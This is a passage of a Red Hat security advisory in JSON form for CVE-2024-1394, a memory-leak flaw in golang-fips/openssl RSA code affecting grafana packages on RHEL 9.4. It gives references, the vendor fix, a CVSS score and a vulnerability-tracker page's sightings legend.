"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-1394"
},
{
"category": "external",
"summary": "RHBZ#2262921",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262921"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-1394",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1394"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-1394",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1394"
},
{
"category": "external",
"summary": "https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136",
"url": "https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136"
},
{
"category": "external",
"summary": "https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6",
"url": "https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6"
},
{
"category": "external",
"summary": "https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f",
"url": "https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-2660",
"url": "https://pkg.go.dev/vuln/GO-2024-2660"
},
{
"category": "external",
"summary": "https://vuln.go.dev/ID/GO-2024-2660.json",
"url": "https://vuln.go.dev/ID/GO-2024-2660.json"
}
],
"release_date": "2024-03-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-30T13:33:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads"
}
]
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…